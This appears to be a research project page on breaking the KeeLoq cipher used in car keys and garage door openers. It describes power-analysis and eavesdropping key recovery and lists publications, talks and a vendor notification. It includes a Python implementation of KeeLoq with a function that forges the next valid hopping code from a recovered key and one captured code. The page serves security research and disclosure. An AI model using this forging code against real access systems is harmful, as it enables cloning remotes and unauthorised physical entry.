A complete break of the KeeLoq access control system.
The KeeLoq encryption algorithm is widely used for security relevant applications in the form of passive Radio Frequency Identification (RFID) transponders for physical access control systems, e.g., for garage door opening or building access.
We present the first successful DPA (Differential Power Analysis) attacks on numerous commercially available products employing KeeLoq. These so-called side-channel attacks are based on measuring and evaluating the power consumption of a KeeLoq device during its operation. Using our techniques, an attacker can reveal not only the secret key of remote controls in less than one hour, but also the manufacturer key of the corresponding receivers in less than one day. Knowing the manufacturer key allows for creating an arbitrary number of valid new keys and generating new remote controls.
We further propose a new eavesdropping attack in which monitoring two ciphertexts sent by a remote control employing KeeLoq code hopping (car key, garage door opener, etc.) is sufficient to recover the device key of that remote control. Hence, using our methods, an attacker can clone a remote control from a distance and gain access to a target protected by the allegedly „highly secure“ KeeLoq algorithm.
We consider our attacks to be of serious practical interest, as commercial KeeLoq access control systems can be overcome with modest effort.
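To make the code-hopping scheme referred to above concrete, the following Python block is an added illustration for this page; it is not code from the authors or from any KeeLoq product. It implements the publicly documented KeeLoq block cipher (32-bit block, 64-bit key, 528 NLFSR rounds, non-linear function 0x3A5C742E) and a simplified hopping-code payload. The payload layout (16-bit synchronisation counter, 12-bit discrimination value, 4-bit button code), the omission of the plaintext serial-number part of a real transmission, and all function names are assumptions made for illustration. The point it demonstrates is why recovering the device key is enough to clone a remote: with the key, one captured hopping code decrypts to its counter, and the next code the receiver will accept can be re-encrypted.

```python
# KeeLoq block cipher plus a simplified code-hopping payload (added illustration).
# Cipher parameters are the public ones; the payload layout is an assumption.

KEELOQ_NLF = 0x3A5C742E  # 5-input non-linear function, stored as a 32-bit truth table
ROUNDS = 528
MASK32 = 0xFFFFFFFF


def _bit(x: int, n: int) -> int:
    return (x >> n) & 1


def _nlf(x: int, a: int, b: int, c: int, d: int, e: int) -> int:
    """Evaluate the NLF on state bits a..e (a is the least significant input)."""
    idx = (_bit(x, a) | (_bit(x, b) << 1) | (_bit(x, c) << 2)
           | (_bit(x, d) << 3) | (_bit(x, e) << 4))
    return _bit(KEELOQ_NLF, idx)


def keeloq_encrypt(block: int, key: int) -> int:
    """Encrypt a 32-bit block under a 64-bit key: shift right, feed new bit in at the top."""
    x = block & MASK32
    for r in range(ROUNDS):
        fb = _bit(x, 0) ^ _bit(x, 16) ^ _bit(key, r & 63) ^ _nlf(x, 1, 9, 20, 26, 31)
        x = (x >> 1) | (fb << 31)
    return x


def keeloq_decrypt(block: int, key: int) -> int:
    """Invert keeloq_encrypt: shift left and consume the key bits in reverse order."""
    x = block & MASK32
    for r in range(ROUNDS):
        fb = _bit(x, 31) ^ _bit(x, 15) ^ _bit(key, (15 - r) & 63) ^ _nlf(x, 0, 8, 19, 25, 30)
        x = ((x << 1) & MASK32) | fb
    return x


# Assumed hopping-code layout: bits 0-15 counter, 16-27 discrimination, 28-31 button.
def hop_encode(device_key: int, counter: int, disc: int, button: int) -> int:
    plain = ((button & 0xF) << 28) | ((disc & 0xFFF) << 16) | (counter & 0xFFFF)
    return keeloq_encrypt(plain, device_key)


def hop_decode(device_key: int, hopping_code: int) -> dict:
    plain = keeloq_decrypt(hopping_code, device_key)
    return {"counter": plain & 0xFFFF,
            "disc": (plain >> 16) & 0xFFF,
            "button": (plain >> 28) & 0xF}


def forge_next(device_key: int, captured_code: int) -> int:
    """Given the device key and one captured hopping code, produce the next valid code.
    This is the cloning step that a recovered device key enables; the key recovery
    itself (via DPA or the two-ciphertext attack) is not modelled here."""
    f = hop_decode(device_key, captured_code)
    return hop_encode(device_key, (f["counter"] + 1) & 0xFFFF, f["disc"], f["button"])


if __name__ == "__main__":
    key = 0x0123456789ABCDEF  # constructed sample key, not a real device key
    captured = hop_encode(key, counter=0x1234, disc=0x2AB, button=0x2)
    print("captured  :", hex(captured), hop_decode(key, captured))
    nxt = forge_next(key, captured)
    print("forged next:", hex(nxt), hop_decode(key, nxt))
```

Because the cipher is a permutation of the 32-bit block for a fixed key, every counter value maps to a distinct hopping code, which is what lets a receiver reject replays; it is also why a single recovered device key turns any one intercepted code into an unlimited supply of fresh ones.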
- July 19, 2009: Update on Attacks, Simple Power Analysis is possible
By means of Simple Power Analysis (SPA), we can now recover the manufacturer key embedded in a KeeLoq receiver from a single power trace. The corresponding paper „Breaking KeeLoq in a Flash: On Extracting Keys at Lightning Speed“ was accepted at Africacrypt 2009 and was presented in Gammarth, Tunisia, in June 2009.
- December 27, 2008: Presentation on the 25th Chaos Communication Congress in Berlin
„Messing Around with Garage Doors – Breaking Remote Keyless Entry Systems with Power Analysis“ Full video of the talk (an extended version of Christof Paar’s talk at CRYPTO 2008), including live demonstrations:
- May 6, 2008: KeeLoq paper accepted at Crypto 2008
Our paper „On the Power of Power Analysis in the Real World: A Complete Break of the KeeLoq Code Hopping Scheme“ was accepted at Crypto 2008 and will be presented in Santa Barbara in August 2008.
- April 5, 2008: EMSEC demonstrates KeeLoq attacks on German television
- March 31, 2008: Press Release about the KeeLoq attack available
- March 29, 2008: Website launched
This website has been launched.
- February 2, 2008: Scientific paper on KeeLoq attack released
A paper describing the scientific aspects of our attacks has been published on the IACR ePrint server.
Physical Cryptanalysis of KeeLoq Code Hopping Applications
- December 2007
We succeeded in recovering both the manufacturer key and the device key from several real-world systems employing the KeeLoq cipher. We informed one manufacturer of KeeLoq products about the attacks.